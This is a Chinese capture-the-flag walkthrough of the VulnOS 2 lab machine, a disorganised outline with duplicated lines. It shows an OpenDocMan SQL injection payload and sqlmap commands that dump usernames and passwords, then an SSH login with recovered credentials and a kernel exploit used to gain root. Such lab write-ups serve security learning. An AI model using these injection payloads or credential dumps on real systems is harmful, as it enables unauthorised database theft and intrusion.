VulnOs2 - 幕布
VulnOs2- 基本介紹和資訊
- 目標
- 滲透服務器上這個公司的網站,獲取root權限并找到Flag
-
- 網站情況
- JABC a bioware company
- JABC a bioware company
- 埠探測
-
- 目錄探測
- robots.txt
- 沒有得到什么重要的資訊
- 沒有得到什么重要的資訊
- 使用dirb掃描也沒有什么重大的識訓
- 通過在網上查找,有人說在http://192.168.1.20/jabc/?q=node/7的 原始碼中有可以利用的資訊
- 首先界面上是沒有什么重要的資訊
- 首先界面上是沒有什么重要的資訊
- 在原始碼中
- 找到了一個登錄的地址/jabcd0cs
- 找到了一個登錄的地址/jabcd0cs
- robots.txt
- 滲透服務器上這個公司的網站,獲取root權限并找到Flag
- 目標
- 發現登錄后臺
- 也可以在那個界面全選
-
- http://192.168.1.20/jabcd0cs
- 是一個OpenDoc Man 的界面
- 是一個OpenDoc Man 的界面
- 查找相關漏洞 在https://www.exploit-db.com/上可以進行搜索,根據opendocman的版本
- 上面有詳細的資訊
- 上面有詳細的資訊
- 基本的介紹
- SQL Injection[CWE-89] Improper Access Control[CWE-284]
- SQL Injection[CWE-89] Improper Access Control[CWE-284]
- details
-
- 使用kali自帶的漏洞搜索工具searchploit opendocman 搜索
- 找到相應版本
-
- 打開后面對應的檔案
- 跟在網站上查到的是一樣的
- 跟在網站上查到的是一樣的
- 找到相應版本
- sql
- The exploitation example below displays version of the MySQL server: http://[host]/ajax_udf.php?q=1&add_value=https://www.cnblogs.com/llzz38-blog/p/odm_user%20UNION%20SELECT%,v ersion%28%29,3,4,5,6,7,8,9
- 得到版本資訊
-
- 有可能是用戶名什么的
-
- 得到版本資訊
- 使用sqlmap
- sqlmap -u "http://192.168.1.20/jabcd0cs/ajax_udf.php?q=1&add_value=https://www.cnblogs.com/llzz38-blog/p/odm_user" -p add_value --dbms MySQL 5.5.47 --dbs
- 有效的資料庫
- 有效的資料庫
- 查看jabcd0cs資料庫有哪些表 sqlmap -u "http://192.168.1.20/jabcd0cs/ajax_udf.php?q=1&add_value=https://www.cnblogs.com/llzz38-blog/p/odm_user" -p add_value -D jabcd0cs --dbms MySQL 5.5.47 --tables
- 發現十五個表
- 發現十五個表
- 查看user表
- sqlmap -u "http://192.168.1.20/jabcd0cs/ajax_udf.php?q=1&add_value=https://www.cnblogs.com/llzz38-blog/p/odm_user" -p add_value -D jabcd0cs -T odm_user --dbms MySQL 5.5.47 --columns
- sqlmap -u "http://192.168.1.20/jabcd0cs/ajax_udf.php?q=1&add_value=https://www.cnblogs.com/llzz38-blog/p/odm_user" -p add_value -D jabcd0cs -T odm_user --dbms MySQL 5.5.47 --columns
- 查看username 和password欄位
- sqlmap -u "http://192.168.1.20/jabcd0cs/ajax_udf.php?q=1&add_value=https://www.cnblogs.com/llzz38-blog/p/odm_user" -p add_value -D jabcd0cs -T odm_user -C "username,password" --dbms MySQL 5.5.47 --dump
- sqlmap -u "http://192.168.1.20/jabcd0cs/ajax_udf.php?q=1&add_value=https://www.cnblogs.com/llzz38-blog/p/odm_user" -p add_value -D jabcd0cs -T odm_user -C "username,password" --dbms MySQL 5.5.47 --dump
- 對密碼進行解密
-
- sqlmap -u "http://192.168.1.20/jabcd0cs/ajax_udf.php?q=1&add_value=https://www.cnblogs.com/llzz38-blog/p/odm_user" -p add_value --dbms MySQL 5.5.47 --dbs
- 還可以
- 獲取密碼
- 獲取密碼
- The exploitation example below displays version of the MySQL server: http://[host]/ajax_udf.php?q=1&add_value=https://www.cnblogs.com/llzz38-blog/p/odm_user%20UNION%20SELECT%,v ersion%28%29,3,4,5,6,7,8,9
- 也可以在那個界面全選
- 登錄SSH
- 使用webmin webmin1980登錄
-
- 使用webmin webmin1980登錄
- 探索一番后沒有找到有用的,查看一下內核
- 內核版本
-
- 查找對應 漏洞
- 同樣是searchsploit 命令
- 同樣是searchsploit 命令
- 在Kali上建立臨時HTTP服務,在目標機上下載
-
- 進行編譯,修改權限,并運行,最后得到了具有root權限的shell
-
- 進入根目錄查看flag
-
- 內核版本
以上內容整理于 幕布
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/6600.html
標籤:其他
下一篇:sentry SSRF